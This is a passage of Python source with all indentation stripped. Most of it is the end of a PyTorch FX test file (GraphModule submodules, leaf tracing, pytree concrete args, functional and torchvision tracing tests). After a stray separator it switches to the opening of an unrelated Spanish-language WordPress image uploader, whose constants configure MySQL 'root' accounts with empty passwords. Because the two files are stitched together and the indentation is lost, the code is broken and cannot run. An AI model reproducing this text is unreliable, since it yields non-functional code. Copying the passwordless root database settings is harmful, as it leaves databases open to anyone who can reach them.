a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
with warnings.catch_warnings(record=True) as w:
dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
self.assertEqual(len(w), 0)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
def module_exists(gm: GraphModule, path: str) -> bool:
return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
def test_tracing_graphmodules_as_leaf_submodules(self):
class A(torch.nn.Module):
def forward(self, t):
return t + t
class B(torch.nn.Module):
def __init__(self):
super(type(self), self).__init__()
self.calling = False
self.called = False
def forward(self, t):
if self.calling:
return t - t
else:
return t + t
def __call__(self, *args):
self.called = True
self.calling = True
return super(type(self), self).__call__(*args)
self.calling = False
class M(torch.nn.Module):
def __init__(self, a, b):
super().__init__()
self.a = a
self.b = b
def forward(self, t):
x = self.a(t)
y = self.b(t)
return x + y
class LeafTracer(Tracer):
def is_leaf_module(self, module, name):
return True
class LeafTracerNotB(Tracer):
def is_leaf_module(self, module, name):
return False if "b" in name else True
# Recompile calls added "for fun", since they
# chain __call__ wrappers.
#
# Test: B as a regular, non-leaf module
#
a = symbolic_trace(A())
a.recompile()
m = M(a, B())
graph = LeafTracerNotB().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is not treated as leaf.
self.assertFalse(hasattr(gm, "b"))
# Test assert custom __call__ on submodule b was honored.
match = [
n
for n in gm.graph.nodes
if n.op == "call_function" and n.target == operator.sub
]
self.assertTrue(len(match) == 1)
#
# Test: B as a regular, leaf module
# symbolic_trace should only patch torch.nn.Module.__call__,
# which means B.__call__ should still execute
#
a = symbolic_trace(A())
a.recompile()
b = B()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is leaf:
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
# Test b.__call__ was run
self.assertTrue(b.called)
self.assertTrue(gm.get_submodule("b").called)
#
# Test: B as GraphModule leaf
# __call__ not honored since symbolic_trace directly invokes forward()
#
a = symbolic_trace(A())
a.recompile()
b = symbolic_trace(B())
b.recompile()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
def test_annotations_empty_tuple(self):
class Foo(torch.nn.Module):
def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]):
return "foo"
traced = torch.fx.symbolic_trace(Foo())
x = ()
y = ("bar", ())
traced(x, y)
FileCheck().check("_Tuple[()]") \
.check("typing_Tuple[str,typing_Tuple[()]]") \
.run(traced.code)
scripted = torch.jit.script(traced)
scripted(x, y)
FileCheck().check("Tuple[()]") \
.check("Tuple[str, Tuple[()]]") \
.run(scripted.code)
@skipIfNoTorchVision
def test_cpatcher(self):
cnt = 0
def patched_impl(to_patch, args, kwargs):
nonlocal cnt
cnt += 1
return to_patch(*args, **kwargs)
c_patch_enabled = True
def patched_in(to_patch, args, kwargs):
nonlocal c_patch_enabled
try:
c_patch_enabled = False
r = patched_impl(to_patch, args, kwargs)
finally:
c_patch_enabled = True
return r
def trace_func(frame, action, arg):
if action == 'c_call':
if c_patch_enabled:
torch._C._fx.patch_function(arg, patched_in)
import torch
rn = torchvision_models.resnet18()
try:
sys.setprofile(trace_func)
rn(torch.rand(1, 3, 224, 224))
print("testing print patch")
finally:
sys.setprofile(None)
assert(cnt != 0)
def test_randn(self):
def f():
return torch.randn(3, 3)
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=False)
assert(all(i.target != torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
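# PH is a placeholder marker: when tracing with pytree-structured concrete_args, leaves equal
# to PH remain real inputs of the traced function, while the structure itself is unpacked via
# tree_flatten_spec (both properties are checked by the assertions in verify_pytree below).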
def test_pytree(self):
def f_sum(x):
return sum(x)
def f_sum_dict(x):
out = 0
for k, v in x.items():
out += v
return out
def f_dict_list_map(x):
new_dict = {}
for k, v in x.items():
new_dict[k] = [i + 1 for i in v]
return new_dict
def f_dict_add(x):
return x['a'] + sum(x['z'])
def f_namedtuple_add(x):
return x.x + x.y
pytree._register_pytree_node(
Foo,
lambda x: ([x.a, x.b], None),
lambda x, _: Foo(x[0], x[1]),
)
fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b])
def f_custom(x):
return x.a + x.b
def f_custom_dict(x):
return f_sum_dict(x.a) + x.b
def f_return_custom(x):
return Foo(x.b, x.a)
tests = [
(f_sum, [PH, PH, PH]),
(f_sum, []),
(f_sum_dict, {'a': PH, 'b': PH, 'c': PH}),
(f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}),
(f_dict_list_map, {5: (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': []}),
(f_custom, Foo(PH, PH)),
(f_custom, Foo(PH, 3)),
(f_custom_dict, Foo({'a': PH, 'b': PH}, PH)),
# (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees
(f_namedtuple_add, Point(PH, PH)),
]
def verify_pytree(f, inp):
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]])
orig_out = f(val)
nf = symbolic_trace(f, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
nf = symbolic_trace(nf)
self.assertEqual(nf(val), orig_out)
assert "tree_flatten_spec" not in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1)
nf = symbolic_trace(nf, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
pickled = pickle.dumps(nf)
nf = pickle.loads(pickled)
self.assertEqual(nf(val), orig_out)
for f, inp in tests:
verify_pytree(f, inp)
def test_pytree_concrete(self):
def f(b, a):
if b:
return a['a']
else:
return a['z']
inp = {'a': {'a': PH, 'z': PH}, 'b': True}
nf = symbolic_trace(f, concrete_args=inp)
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
self.assertEqual(nf(**val), f(**val))
nf = symbolic_trace(nf)
self.assertEqual(nf(**val), f(**val))
def run_getitem_target():
from torch.fx._symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
class TestOperatorSignatures(JitTestCase):
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
# Sorted and one entry on each line to minimize merge conflicts.
known_no_schema = {'cdist',
'contiguous',
'dstack',
'einsum',
'expand',
'expand_as',
'fill_',
'hstack',
'linalg.multi_dot',
'lu',
'norm',
'polygamma',
'special.polygamma',
'repeat',
'reshape_as',
'resize_',
'resize_as_',
'special.zeta',
'stack',
'to_sparse',
'view',
'view_as',
'nn.functional.hardshrink',
'vstack',
'where',
'zero_',
'__getitem__',
'__radd__',
'__rsub__',
'__rmul__',
'__rdiv__',
'__rmod__',
'__rpow__',
'__rand__',
'__ror__',
'__rxor__',
'__rmatmul__'}
try:
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
except Exception as e:
assert op.name in known_no_schema or "nn.functional" in op.name
class TestFunctionalTracing(JitTestCase):
IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
"has_torch_function_variadic", "handle_torch_function",
"boolean_dispatch")
TO_PATCH = {"has_torch_function": None,
"has_torch_function_unary": None,
"has_torch_function_variadic": None}
BUILT_IN_FUNC = (AssertionError, "")
PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")
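# Each entry maps a torch.nn.functional name to the (exception type, message regex) that
# symbolic_trace is expected to raise for it; see generate_test_func below.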
UNTRACEABLE_FUNCTIONALS = {
"adaptive_avg_pool1d": BUILT_IN_FUNC,
"avg_pool1d": BUILT_IN_FUNC,
"avg_pool2d": BUILT_IN_FUNC,
"avg_pool3d": BUILT_IN_FUNC,
"celu_": BUILT_IN_FUNC,
"channel_shuffle": BUILT_IN_FUNC,
"conv1d": BUILT_IN_FUNC,
"conv2d": BUILT_IN_FUNC,
"conv3d": BUILT_IN_FUNC,
"conv_tbc": BUILT_IN_FUNC,
"conv_transpose1d": BUILT_IN_FUNC,
"conv_transpose2d": BUILT_IN_FUNC,
"conv_transpose3d": BUILT_IN_FUNC,
"cosine_similarity": BUILT_IN_FUNC,
"elu_": BUILT_IN_FUNC,
"hardtanh_": BUILT_IN_FUNC,
"leaky_relu_": BUILT_IN_FUNC,
"logsigmoid": BUILT_IN_FUNC,
"one_hot": BUILT_IN_FUNC,
"pdist": BUILT_IN_FUNC,
"pixel_shuffle": BUILT_IN_FUNC,
"pixel_unshuffle": BUILT_IN_FUNC,
"relu_": BUILT_IN_FUNC,
"rrelu_": BUILT_IN_FUNC,
"selu_": BUILT_IN_FUNC,
"softplus": BUILT_IN_FUNC,
"softshrink": BUILT_IN_FUNC,
"threshold_": BUILT_IN_FUNC,
"adaptive_avg_pool2d": LEN_ERROR,
"adaptive_avg_pool3d": LEN_ERROR,
"adaptive_max_pool2d_with_indices": LEN_ERROR,
"adaptive_max_pool3d_with_indices": LEN_ERROR,
"instance_norm": CONTROL_FLOW,
"pad": LEN_ERROR,
"adaptive_max_pool1d": PROXY_ITERABLE,
"adaptive_max_pool2d": PROXY_ITERABLE,
"adaptive_max_pool3d": PROXY_ITERABLE,
"fractional_max_pool2d": PROXY_ITERABLE,
"fractional_max_pool3d": PROXY_ITERABLE,
"max_pool1d": PROXY_ITERABLE,
"max_pool2d": PROXY_ITERABLE,
"max_pool3d": PROXY_ITERABLE,
"group_norm": PROXY_ITERATED,
"lp_pool2d": PROXY_ITERATED,
"max_unpool1d": PROXY_ITERATED,
"max_unpool2d": PROXY_ITERATED,
"max_unpool3d": PROXY_ITERATED,
"adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"hardshrink": ARG_TYPE_MISMATCH,
"layer_norm": ARG_TYPE_MISMATCH,
"lp_pool1d": ARG_TYPE_MISMATCH,
"max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"pairwise_distance": ARG_TYPE_MISMATCH,
"affine_grid": CONTROL_FLOW,
"alpha_dropout": CONTROL_FLOW,
"batch_norm": CONTROL_FLOW,
"binary_cross_entropy": CONTROL_FLOW,
"binary_cross_entropy_with_logits": CONTROL_FLOW,
"celu": CONTROL_FLOW,
"cosine_embedding_loss": CONTROL_FLOW,
"cross_entropy": CONTROL_FLOW,
"ctc_loss": CONTROL_FLOW,
"dropout": CONTROL_FLOW,
"dropout2d": CONTROL_FLOW,
"dropout3d": CONTROL_FLOW,
"elu": CONTROL_FLOW,
"embedding": CONTROL_FLOW,
"embedding_bag": CONTROL_FLOW,
"feature_alpha_dropout": CONTROL_FLOW,
"fold": CONTROL_FLOW,
"gaussian_nll_loss": CONTROL_FLOW,
"glu": CONTROL_FLOW,
"grid_sample": CONTROL_FLOW,
"gumbel_softmax": CONTROL_FLOW,
"hardsigmoid": CONTROL_FLOW,
"hardswish": CONTROL_FLOW,
"hardtanh": CONTROL_FLOW,
"hinge_embedding_loss": CONTROL_FLOW,
"huber_loss": CONTROL_FLOW,
"interpolate": CONTROL_FLOW,
"kl_div": CONTROL_FLOW,
"l1_loss": CONTROL_FLOW,
"leaky_relu": CONTROL_FLOW,
"local_response_norm": CONTROL_FLOW,
"margin_ranking_loss": CONTROL_FLOW,
"mse_loss": CONTROL_FLOW,
"multi_head_attention_forward": CONTROL_FLOW,
"multi_margin_loss": CONTROL_FLOW,
"multilabel_margin_loss": CONTROL_FLOW,
"multilabel_soft_margin_loss": CONTROL_FLOW,
"nll_loss": CONTROL_FLOW,
"poisson_nll_loss": CONTROL_FLOW,
"relu": CONTROL_FLOW,
"relu6": CONTROL_FLOW,
"rrelu": CONTROL_FLOW,
"selu": CONTROL_FLOW,
"silu": CONTROL_FLOW,
"mish": CONTROL_FLOW,
"smooth_l1_loss": CONTROL_FLOW,
"soft_margin_loss": CONTROL_FLOW,
"threshold": CONTROL_FLOW,
"triplet_margin_loss": CONTROL_FLOW,
"triplet_margin_with_distance_loss": CONTROL_FLOW,
"unfold": CONTROL_FLOW,
"upsample": CONTROL_FLOW,
"upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
"upsample_nearest": INTERPOLATE_ARGS_CONFLICT,
}
# nn.functional entries that take Tensor inputs but whose signatures lack type annotations
FUNCTIONALS_WITHOUT_ANNOTATION = (
"adaptive_max_pool1d",
"adaptive_max_pool2d",
"adaptive_max_pool3d",
"fractional_max_pool2d",
"fractional_max_pool3d",
"max_pool1d",
"max_pool2d",
"max_pool3d",
"gaussian_nll_loss",
"upsample",
"upsample_bilinear",
"upsample_nearest",
)
# Inconsistent behavior between Python 3.8 and other Python versions:
# - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED`
# - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
# internal exception above
# Use the following map to override the expected exception for Python 3.8
UNTRACEABLE_FUNCTIONALS_PY38 = {
"adaptive_max_pool1d": PROXY_ITERATED,
"adaptive_max_pool2d": PROXY_ITERATED,
"adaptive_max_pool3d": PROXY_ITERATED,
"fractional_max_pool2d": PROXY_ITERATED,
"fractional_max_pool3d": PROXY_ITERATED,
"max_pool1d": PROXY_ITERATED,
"max_pool2d": PROXY_ITERATED,
"max_pool3d": PROXY_ITERATED,
"group_norm": LEN_ERROR
}
@classmethod
def _get_functional(cls):
functional_list = []
for f in dir(torch.nn.functional):
if not f.islower():
continue
# Ignore internal functions
if f.startswith('_'):
continue
# Ignore supporting functions
if f in cls.IGNORE_FUNCS:
continue
fn = getattr(torch.nn.functional, f)
# Ignore non-callable object like modules
if not isinstance(fn, Callable):
continue
if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
try:
sig = inspect.signature(fn)
has_tensor_arg = False
for arg, param in sig.parameters.items():
if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
has_tensor_arg = True
if not has_tensor_arg:
continue
# inspect.signature can raise ValueError (e.g. for builtins); fall through and keep the functional
except ValueError:
pass
functional_list.append((f, fn))
return functional_list
@classmethod
def generate_test_func(cls, func_name, fn):
def functional_test(self):
if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
sys.version_info >= (3, 8) and sys.version_info < (3, 10):
exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
elif func_name in self.UNTRACEABLE_FUNCTIONALS:
exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
else:
symbolic_trace(fn)
return functional_test
@classmethod
def generate_tests(cls):
functional_list = cls._get_functional()
for func_name, fn in functional_list:
test_name = "test_nn_functional_" + func_name
functional_test = cls.generate_test_func(func_name, fn)
setattr(cls, test_name, functional_test)
@classmethod
def setUpClass(cls):
def no(*args, **kwargs):
return False
for name in cls.TO_PATCH.keys():
cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
setattr(torch.nn.functional, name, no)
@classmethod
def tearDownClass(cls):
for name in cls.TO_PATCH.keys():
setattr(torch.nn.functional, name, cls.TO_PATCH[name])
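# Synthesize one test_nn_functional_<name> method per torch.nn.functional entry at import time.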
TestFunctionalTracing.generate_tests()
instantiate_device_type_tests(TestOperatorSignatures, globals())
@skipIfNoTorchVision
class TestVisionTracing(JitTestCase):
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
INCONSISTENT_TYPE = (
RuntimeError,
r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor"
)
UNTRACEABLE_MODELS = {
"fasterrcnn_resnet50_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED,
"maskrcnn_resnet50_fpn": PROXY_ITERATED,
"keypointrcnn_resnet50_fpn": PROXY_ITERATED,
"retinanet_resnet50_fpn": PROXY_ITERATED,
}
UNSCRIPTABLE_MODELS = {
"googlenet": INCONSISTENT_TYPE,
"inception_v3": INCONSISTENT_TYPE,
}
output_transform = {
"fcn_resnet50": lambda x: x["out"],
"fcn_resnet101": lambda x: x["out"],
"deeplabv3_resnet50": lambda x: x["out"],
"deeplabv3_resnet101": lambda x: x["out"],
"deeplabv3_mobilenet_v3_large": lambda x: x["out"],
"lraspp_mobilenet_v3_large": lambda x: x["out"],
"fasterrcnn_resnet50_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1],
"maskrcnn_resnet50_fpn": lambda x: x[1],
"keypointrcnn_resnet50_fpn": lambda x: x[1],
"retinanet_resnet50_fpn": lambda x: x[1],
}
@classmethod
def generate_test_fn(cls, name, model_fn, x, kwargs):
def run_test(self):
model = model_fn(**kwargs)
model = model.eval()
if name in self.UNTRACEABLE_MODELS:
                exc, err = self.UNTRACEABLE_MODELS[name]
                with self.assertRaisesRegex(exc, err):
graph = symbolic_trace(model)
else:
out_transform = self.output_transform.get(name, lambda x: x)
graph : torch.fx.GraphModule = symbolic_trace(model)
a = out_transform(model(x))
b = out_transform(graph(x))
self.assertEqual(a, b)
if name in self.UNSCRIPTABLE_MODELS:
                    exc, err = self.UNSCRIPTABLE_MODELS[name]
                    with self.assertRaisesRegex(exc, err):
script = torch.jit.script(graph)
else:
script = torch.jit.script(graph)
c = out_transform(script(x))
self.assertEqual(a, c)
return run_test
@classmethod
def generate_classification_tests(cls):
for k, v in torchvision_models.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_' + k
x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_segmentation_tests(cls):
for k, v in torchvision_models.segmentation.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_segmentation_' + k
x = torch.rand(1, 3, 32, 32)
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_detection_tests(cls):
for k, v in torchvision_models.detection.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_detection_' + k
x = [torch.rand(3, 300, 300)]
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_video_tests(cls):
for k, v in torchvision_models.video.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_video_' + k
x = torch.rand(1, 3, 4, 112, 112)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_tests(cls):
cls.generate_classification_tests()
cls.generate_detection_tests()
cls.generate_segmentation_tests()
cls.generate_video_tests()
if HAS_TORCHVISION:
TestVisionTracing.generate_tests()
if __name__ == '__main__':
run_tests()
|
expup.py
|
#=============================================================#
# #
# EL EXPRESO DEL DEPORTE #
# ExpUp - Image Uploader #
#-------------------------------------------------------------#
# Developed by: Luis Jose Lopez Miranda #
# This software is licensed under the MIT License (Expat) #
# #
#=============================================================#
# Import all necessary modules
#1 - Tkinter
import tkinter as tk
from tkinter import filedialog
from tkinter import messagebox
from tkinter import ttk
#2 - OS File I/O
import os
from os import listdir
from os.path import isfile, join, exists
#3 - Image Manipulation
import PIL
from PIL import Image, ImageTk, ImageEnhance
#4 - MySQL Integration
import pymysql
import sys
#5 - Internet I/O
import urllib.request,io
#6 - Passlib Hasher
import passlib
from passlib.hash import phpass
#7 - Wordpress Integration
from wordpress_xmlrpc import Client, WordPressPost
from wordpress_xmlrpc.compat import xmlrpc_client
from wordpress_xmlrpc.methods import media, posts
#8 - Time
import time
#9 - Threading
import threading
#10 - Mimetypes
import mimetypes
#11 - Random
import random
#12 - SMTP for email integration
import smtplib
#### Defines
# Software Info
SOFTWARE_NAME = "ExpUp"
SOFTWARE_DESCRIPTION = "Procesador de imagenes para El Expreso del Deporte"
VERSION = "0.1b"
AUTHOR = "Luis Jose Lopez Miranda"
AUTHOR_LINK = ""
LAST_REV = "11 de enero, 2015"
# Links
MAIN_IMAGE = 'images/header_ES.png'
WP_URL = 'http://elexpresodeldeporte.com/xmlrpc.php'
TEMP_FOLDER_NAME = "_temp/"
ICON_URL = 'images/expup.ico'
# MySQL-WP Information
WP_MYSQL_HOST = "localhost"
WP_MYSQL_USER = "root"
WP_MYSQL_PASS = ""
WP_MYSQL_DB = "wp-db"
# MySQL-EXPUP Information
MYSQL_HOST = "localhost"
MYSQL_USER = "root"
MYSQL_PASS = ""
MYSQL_DB = "expup"
# Size
MAX_W = 720
MAX_H = 640
# Colors
MAIN_BG = "#FFFFFF"
S_BG = "#000000"
TITLE_BG = "#FFFFFF"
I_BG = "#FF3300"
I_TEXT = "#FF3300"
MAIN_TEXT = "#000000"
S_TEXT = "#FFFFFF"
# Spanish texts
MY_SQL_ERROR = "Error en la conexion MySQL"
MAKE_SURE_INTERNET = "Asegurese de estar conectado a internet"
FIRST_STEP = "Seleccione la carpeta con las fotos que desea subir"
SELECT_FOLDER = "Seleccionar carpeta"
LOG_IN_PLEASE = "Por favor ingrese sus datos"
